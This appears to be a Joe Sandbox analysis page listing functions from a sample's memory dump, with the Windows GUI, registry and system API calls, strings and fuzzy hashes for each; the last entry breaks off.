Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: 57a82e6ef6f1037efc387804484e0afe7d564d34bb21f81ceb8fc519a169756a
Instruction ID: 8c3b95b8916903e56e33aa0768e71ca7658086cdeadcb039038974be68b75dbd
Opcode Fuzzy Hash: 57a82e6ef6f1037efc387804484e0afe7d564d34bb21f81ceb8fc519a169756a
Instruction Fuzzy Hash: 0841E775A04209AFEB10EBA8C9C5F9EB7B9EF48304F1141A0BA14EB295D774BE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04153BBC Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 04153BE2
IsWindowUnicode.USER32(00000000), ref: 04153C25
SendMessageW.USER32(00000000,-0000BBEE,029367A0,?), ref: 04153C40
SendMessageA.USER32(00000000,-0000BBEE,029367A0,?), ref: 04153C5F
GetWindowThreadProcessId.USER32(00000000), ref: 04153C6E
GetWindowThreadProcessId.USER32(?,?), ref: 04153C7C
SendMessageA.USER32(00000000,-0000BBEE,029367A0,?), ref: 04153C9C

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
Instruction ID: b3fe3c7da69aa2f3f7e93e14db088f203067560ac39259354f0d7909b5d2c5fa
Opcode Fuzzy Hash: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
Instruction Fuzzy Hash: 2A214D7120424CAFE760FAA9CDC0EA7B3EDAB49294B108466FD79C7691D790F8208770

Uniqueness

Uniqueness Score: -1.00%

Function 04123A48 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04123A76
GetDeviceCaps.GDI32(?,00000068), ref: 04123A92
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04123AB1
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 04123AD5
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 04123AF3
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 04123B07
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04123B27
ReleaseDC.USER32(00000000,?), ref: 04123B3F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: 191eb7fc297a61615a6461e4851abeabe30e28640bf97c6191c7a7f2a311427c
Instruction ID: a85acab48ca84193f06c5c581715deed06e086f7b786f12b00f60f798281a841
Opcode Fuzzy Hash: 191eb7fc297a61615a6461e4851abeabe30e28640bf97c6191c7a7f2a311427c
Instruction Fuzzy Hash: 782144B1A40218AFEB10DBA4CDC5FAE73BCEB08704F504591BB44E61C0D7B9BE508B29

Uniqueness

Uniqueness Score: -1.00%

Function 0412F99C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 177windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0412FBED), ref: 0412FA38
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0412FB41

Part of subcall function 0412FEA0: CreatePopupMenu.USER32 ref: 0412FEBB

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0412FBCA

Part of subcall function 0412FEA0: CreateMenu.USER32 ref: 0412FEC5

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0412FBB1

Strings

?, xrefs: 0412FA53
,, xrefs: 0412FA4C

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: cafc768d735db7036aada86d17d75eb83217c915fc6e6ec44d7a491d61c5de27
Instruction ID: efca5af7a0bde08ef43d59ecbf431e84a19acf6c8fed528e558806d523d0af77
Opcode Fuzzy Hash: cafc768d735db7036aada86d17d75eb83217c915fc6e6ec44d7a491d61c5de27
Instruction Fuzzy Hash: 6A61F330A04264AFEB10EF69DAC0A6A77F5EF06304F4441A5ED50E7285D738FD66DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04143708 Relevance: 10.7, APIs: 7, Instructions: 162COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,041438EC), ref: 041437ED
GetTickCount.KERNEL32 ref: 041437F2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 04143836
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0414384E
AnimateWindow.USER32(00000000,00000064,?), ref: 04143893
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,041438EC), ref: 041438B6

Part of subcall function 04146EC8: GetCursorPos.USER32(?), ref: 04146ECC

GetTickCount.KERNEL32 ref: 041438D3

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 3d5573c445a8be8317e21363896d4081c1771d5ae05af0a9fb1147a040ee48b0
Instruction ID: 334f047361db9933a884c8a8f58c7ee22c5d7211a9888722912725691a3f8b23
Opcode Fuzzy Hash: 3d5573c445a8be8317e21363896d4081c1771d5ae05af0a9fb1147a040ee48b0
Instruction Fuzzy Hash: C6512A74A00209EFEB10DF98C9C5AAEB7F5EF45314F2086A0E950EB294D774BE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 041540FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 041554A8: GetActiveWindow.USER32 ref: 041554CF
Part of subcall function 041554A8: GetLastActivePopup.USER32(?), ref: 041554E1

GetWindowRect.USER32(?,?), ref: 0415417E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 041541B6
MessageBoxA.USER32(00000000,?,?,?), ref: 041541F5
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0415426B), ref: 04154245
SetActiveWindow.USER32(00000000,0415426B), ref: 04154256

Strings

(, xrefs: 0415415B

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: 285c1308261285c4b0eaba5c6b945591e101842aff428d5d5d3d49dd5a67d6fb
Instruction ID: 1cd87428bf0fe225fdd388974ecee9566edb9e7b7dd3db44e78e784f8c2e4769
Opcode Fuzzy Hash: 285c1308261285c4b0eaba5c6b945591e101842aff428d5d5d3d49dd5a67d6fb
Instruction Fuzzy Hash: 4A51D775A00218EFEB04DBA9DD81FAEB7B9EB88304F148455E915EB2A1DB74BD408B50

Uniqueness

Uniqueness Score: -1.00%

Function 041519D8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,04151B83,?,0293D9D0,?,04151BE5,00000000,?,0413D22F), ref: 04151A2E
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 04151A96
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,04151B3F,?,80000002,00000000), ref: 04151AD0
RegCloseKey.ADVAPI32(?,04151B46,00000000,?,00000100,00000000,04151B3F,?,80000002,00000000), ref: 04151B39

Strings

layout text, xrefs: 04151AC7
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 04151A80

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: eeff7fee601d41162a859e79f885b88c1e311009229d19876177cb08a3ce6a41
Instruction ID: 25233f256c3a510ffd477ee41913fdaa1fc8be37248149e352ac5e50f0f050c7
Opcode Fuzzy Hash: eeff7fee601d41162a859e79f885b88c1e311009229d19876177cb08a3ce6a41
Instruction Fuzzy Hash: 29410574A00209EFEB11DF94C9C0BDEB7F9EB48704F5184E5E914A72A1E7B0AE44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04153DEC Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 04153E00
IsWindowUnicode.USER32 ref: 04153E14
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04153E35
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04153E4B
TranslateMessage.USER32 ref: 04153ED4
DispatchMessageW.USER32 ref: 04153EE0
DispatchMessageA.USER32 ref: 04153EE8

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
Instruction ID: fe8e93366be482badf01f4b8cbd8cdcf4e42f0c057b38ff242852ded945e09db
Opcode Fuzzy Hash: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
Instruction Fuzzy Hash: A221E630708348E7FA316A280DC1BFF92D98F92BC8F144499FDB1971E2D7E5B4464126

Uniqueness

Uniqueness Score: -1.00%

Function 0414D0F0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 0414D161
GetWindowLongA.USER32(00000000,000000EC), ref: 0414D173
GetClassLongA.USER32(00000000,000000E6), ref: 0414D186
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0414D1C6
SetWindowLongA.USER32(00000000,000000EC,?), ref: 0414D1DA
SetClassLongA.USER32(00000000,000000E6,?), ref: 0414D1EE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 0414D20A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Long$Window$Class
String ID:
API String ID: 2026531576-0
Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction ID: adb9452815df8c5db94a1eb7599337e55a68ab2434b7e049d7c960691bfbbeef
Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction Fuzzy Hash: 9421537430828176EA05B77C9CC8ABEB7995FC121CF1886A4F864DB2D0CBB4F846D761

Uniqueness

Uniqueness Score: -1.00%

Function 04151D24 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 04151D79
CreateFontIndirectA.GDI32(?), ref: 04151D86
GetStockObject.GDI32(0000000D), ref: 04151D9C

Part of subcall function 04122518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04122525

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 04151DC5
CreateFontIndirectA.GDI32(?), ref: 04151DD5
CreateFontIndirectA.GDI32(?), ref: 04151DEE
GetStockObject.GDI32(0000000D), ref: 04151E14

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 898e4b959d762921e4e3941335b82f14c032df72580d1836e3d65a32e2ac7bfa
Instruction ID: fb033d77dd08129b595f1d43d6b2e3d5ca68814f8c286f1aff068b85f8af5a83
Opcode Fuzzy Hash: 898e4b959d762921e4e3941335b82f14c032df72580d1836e3d65a32e2ac7bfa
Instruction Fuzzy Hash: F2318E30B05684ABFB55EB64D9C6BD932E4EB44304F8580B0A948DA295EF78BD49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 04156C70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0410C91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,0410C9F2), ref: 0410C95E
Part of subcall function 0410C91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,0410C9D5,?,00000000,?,00000000,0410C9F2), ref: 0410C993
Part of subcall function 0410C91C: VerQueryValueA.VERSION(?,0410CA04,?,?,00000000,?,00000000,?,00000000,0410C9D5,?,00000000,?,00000000,0410C9F2), ref: 0410C9AD

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 04156CA4
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 04156CB5
ImageList_Write.COMCTL32(00000000,?,00000000,04156D6A), ref: 04156D34

Strings

comctl32.dll, xrefs: 04156C9F
ImageList_WriteEx, xrefs: 04156CAF
comctl32.dll, xrefs: 04156C84

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 4063495462-3125200627
Opcode ID: eaedb8a56f0bd4ce9b4d3e33420886db145927bb207fd6e3e22213dcccf734a1
Instruction ID: 0d91ddda0dd6382ccd2eef3ac994c27499aa1d57caaade0cd2b96f610b73a347
Opcode Fuzzy Hash: eaedb8a56f0bd4ce9b4d3e33420886db145927bb207fd6e3e22213dcccf734a1
Instruction Fuzzy Hash: E221C730300280EBE714AF79C9C5BA977B9DB40348B804564EC68D32B0DBB6BC44DA90

Uniqueness

Uniqueness Score: -1.00%

Function 04133008 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(00000000), ref: 04133030

Part of subcall function 041202A4: RegCloseKey.ADVAPI32(10940000,04120180,00000001,04120222,?,?,041276BA,00000008,00000060,00000048,00000000,0412775F), ref: 041202B8

Part of subcall function 04120308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 04120374

Part of subcall function 0410DC04: SetErrorMode.KERNEL32 ref: 0410DC0E
Part of subcall function 0410DC04: LoadLibraryA.KERNEL32(00000000,00000000,0410DC58,?,00000000,0410DC76), ref: 0410DC3D

GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 041330C1
FreeLibrary.KERNEL32(?,041330FB,?,00000000,0413313B), ref: 041330EE

Strings

KbdLayerDescriptor, xrefs: 041330B8
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 04133075
Layout File, xrefs: 0413308D

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3365787578-2194312379
Opcode ID: 534aa291d1412b08186ec57029db91f10b9438f0a0ea42c541b3eab287a7688c
Instruction ID: 209547b28fa6c11386d8fc65c83bfa78fc9752962a5bbc198035f17d00e08707
Opcode Fuzzy Hash: 534aa291d1412b08186ec57029db91f10b9438f0a0ea42c541b3eab287a7688c
Instruction Fuzzy Hash: 9521BD70E00249AFEF01EFA4C9D199EBBB6EB4D304F408464E910E7640DB79BD55CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0412B0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0412B0FC
GetSystemMetrics.USER32(00000000), ref: 0412B111
GetSystemMetrics.USER32(00000001), ref: 0412B11C
lstrcpyA.KERNEL32(?,DISPLAY), ref: 0412B146

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

Strings

DISPLAY, xrefs: 0412B13D
GetMonitorInfoA, xrefs: 0412B0BC

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: fa08404d99babf207a96c314e6bc9c935741a83d7c8722a50a033695ccfe3192
Instruction ID: fb9bdd21b6d3f06b8c6266234eacfea4597c82279c0fc8bfc73a6c013181dbc8
Opcode Fuzzy Hash: fa08404d99babf207a96c314e6bc9c935741a83d7c8722a50a033695ccfe3192
Instruction Fuzzy Hash: 1F11AF317043649FE720CF65AA847A7B7F8EF05790F004529E955E7280D7B8BC948BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0412B178 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0412B1D0
GetSystemMetrics.USER32(00000000), ref: 0412B1E5
GetSystemMetrics.USER32(00000001), ref: 0412B1F0
lstrcpyA.KERNEL32(?,DISPLAY), ref: 0412B21A

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

Strings

GetMonitorInfoW, xrefs: 0412B190
DISPLAY, xrefs: 0412B211

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: f101207c6c3e58d6406ac8b728ca09cb4933c978ae161edbcd1f0ff0b4bb3cd7
Instruction ID: fb317f396fb55446c6a5518c7ff5104b8cda66bf577bf9a858e4ed323e567fb2
Opcode Fuzzy Hash: f101207c6c3e58d6406ac8b728ca09cb4933c978ae161edbcd1f0ff0b4bb3cd7
Instruction Fuzzy Hash: 9711AF317053605FE760CF659A84BABB7E8EF05751F004529ED55E7240D7B4BC98CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04124E74 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 04123C9C: GetObjectA.GDI32(?,00000004), ref: 04123CB3
Part of subcall function 04123C9C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 04123CD6

GetDC.USER32(00000000), ref: 04124EB2
CreateCompatibleDC.GDI32(?), ref: 04124EBE
SelectObject.GDI32(?), ref: 04124ECB
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,04124F23,?,?,?,?,00000000), ref: 04124EEF
SelectObject.GDI32(?,?), ref: 04124F09
DeleteDC.GDI32(?), ref: 04124F12
ReleaseDC.USER32(00000000,?), ref: 04124F1D

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 1fdd6597016252cd8efd677dbfa7f59010a2b788917aba5f5610136fae185916
Instruction ID: a75417a2d92c4f69c1f0cd5838b2321c6fd51bec99752047f83c496efa4d1537
Opcode Fuzzy Hash: 1fdd6597016252cd8efd677dbfa7f59010a2b788917aba5f5610136fae185916
Instruction Fuzzy Hash: FD112471E04319ABEB10EBE8CD90AAEB3FCFB48704F0084A5B514D7280D7B5B9508B50

Uniqueness

Uniqueness Score: -1.00%

Function 04151C88 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 04151CA3
WindowFromPoint.USER32(?,?), ref: 04151CB0
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 04151CBE
GetCurrentThreadId.KERNEL32 ref: 04151CC5
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 04151CEE
SendMessageA.USER32(00000000,00000020,00000000,?), ref: 04151D00
SetCursor.USER32(00000000), ref: 04151D12

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction ID: ee3640afe41435ecd02c81d1da43712c46afa530919d3d4c36f631c954c48188
Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction Fuzzy Hash: 1401F535204380B5E7223B648CC8F7F76A8DF85A99F108459F9989A1E0F775FC009326

Uniqueness

Uniqueness Score: -1.00%

Function 0410BFC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0410BE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0410BE59
Part of subcall function 0410BE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0410BE7D
Part of subcall function 0410BE3C: GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 0410BE98
Part of subcall function 0410BE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0410BF2E

CharToOemA.USER32(?,?), ref: 0410BFFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0410C018
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0410C01E
GetStdHandle.KERNEL32(000000F4,0410C088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0410C033
WriteFile.KERNEL32(00000000,000000F4,0410C088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0410C039
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0410C05B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0410C071

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

